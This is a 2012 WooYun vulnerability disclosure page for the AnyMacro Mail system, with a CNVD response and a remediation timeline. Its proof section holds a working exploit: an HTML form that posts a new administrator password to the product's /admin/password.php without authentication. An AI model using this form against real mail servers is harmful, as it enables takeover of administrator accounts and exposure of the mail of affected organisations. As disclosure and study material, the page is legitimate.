当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-06672

漏洞标题:AnyMacro Mail 重大漏洞 涉及政府、军工、收费运营商、大型企业

相关厂商:AnyMacro Mail

漏洞作者: 松子

提交时间:2012-05-04 16:52

修复时间:2012-06-18 16:53

公开时间:2012-06-18 16:53

漏洞类型:非授权访问/权限绕过

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2012-05-04: 细节已通知厂商并且等待厂商处理中
2012-05-07: 厂商已经确认,细节仅向厂商公开
2012-05-10: 细节向第三方安全合作伙伴开放
2012-07-01: 细节向核心白帽子及相关领域专家公开
2012-07-11: 细节向普通白帽子公开
2012-07-21: 细节向实习白帽子公开
2012-06-18: 细节向公众公开

简要描述:

对于设置密码的页面存在漏洞可以直接修改原密码,本人技术很菜找不到路径拿不到shell
用的地方还是挺多的。涉及政府、军工、收费运营商、大型企业怕和谐所以放出了。

详细说明:

漏洞证明:

EXP:

<html>
<head>
<title> </title>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<link rel="stylesheet" href="tpl/sysadm.css" type="text/css">
</head>
<body class=bgcolor3>
<br><br><br><br><br><br>
<table width=260 cellspacing=0 cellpadding=0 align=center valign=middle>
<tr height=11 class=bgcolor1>
<td width=11><img src=tpl/image/topleft.gif></td>
<td></td>
<td width=11><img src=tpl/image/topright.gif></td>
</tr>
<tr align=center class=bgcolor1>
<td width=11></td>
<td class=font13><p class=font14><br><b>设置邮件系统管理密码</b></p>
<form method=post action=网址/admin/password.php>
密  码: <input type=password name=password size=14><p>
重输密码: <input type=password name=password2 size=14><p>
<input type=submit value="修改密码">
</form>
</td>
<td width=11></td>
</tr>
<tr height=11 class=bgcolor1>
<td width=11><img src=tpl/image/bottomleft.gif></td>
<td></td>
<td width=11><img src=tpl/image/bottomright.gif></td>
</tr>
</table>
<br><br><br><br><br><br><br>
<table cellspacing=0 cellpadding=0 height=1 width=500 align=center><tr><td
class=bgcolor1></td></tr>
<tr><td align=center height=35 valign=bottom class=bgcolor3>Copyright &copy; 2002 Beijing
Anymacro Investment Ltd. All Rights Reserved.<br>
北京安宁投资有限公司 版权所有 </td></tr>
</table>
</body>

修复方案:

自己搞

版权声明:转载请注明来源 松子@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2012-05-07 15:55

厂商回复:

CNVD确认漏洞情况并复现所述过程,将分两步同步进行处置:一是协调生产厂商(此前联系过两次),要求提供修复方案;二是向国务院某信息安全协调机构通报,联系受影响部门处置。
对漏洞评分如下:
CVSS:(AV:R/AC:L/Au:NR/C:P/A:C/I:P/B:N) score:8.97(最高10分,高危)
即:远程攻击、攻击难度低、不需要用户认证,对可用性造成完全影响,对机密性、完整性造成部分影响。
技术难度系数:1.1(发现这个漏洞运气和实力都需要)
影响危害系数:2.0(较严重,涉及重要部门在线业务系统,存在信息泄露风险)
CNVD综合评分:8.97*1.1*2.0=19.734

最新状态:

2012-05-21:至5月20日,除上报国务院某信息安全协调机构处置外,邮件系统厂商——安宁公司提供了修复补丁,替换了存在漏洞的文件页面,同时对部分级别较高的部委、北京市地区的政府和高校网站进行了应急服务。建议相关用户联系厂商以便及时修复。